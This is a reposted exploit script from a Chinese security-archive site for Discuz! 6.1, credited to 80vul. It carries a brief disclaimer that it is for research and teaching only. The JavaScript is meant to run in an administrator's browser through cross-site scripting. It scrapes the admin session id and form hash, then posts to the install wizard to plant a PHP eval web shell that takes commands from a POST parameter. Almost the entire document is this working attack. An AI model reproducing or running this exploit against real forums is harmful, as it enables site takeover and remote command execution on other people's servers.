[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/*
#############################################
Discuz! 6.1 xss2webshell[SODB-2008-10] Exploit
by 80vul-A
team: http://www.80vul.com
#############################################
*/
//目标url
var siteurl='http://www.80vul.com/Discuz_6.1.0/';
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
//得到sid
xmlhttp.open("GET", siteurl+"admincp.php?frames=yes", false);
//firefox3 不可以用xmlhttp.send(); http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html
//thx luoluo@ph4nt0m.org
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = /action=home&sid=([\w\d]+)\" /i;
var arr=reg.exec(echo);
if(!arr){
//没有登陆后台
//alert(document.cookie);
}else{
var sid=arr[1];
}
//得到formhash
xmlhttp.open("GET", siteurl+"admincp.php?action=home&sid="+sid, false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;
var arr=reg.exec(echo);
window.onerror=function(){return true;}
var formhash=arr[1];
//alert(formhash);
//通过SODB-2008-10写入webshell
//http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt
xmlhttp.open("POST", siteurl+"admincp.php?action=runwizard&step=3", false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash="+formhash));
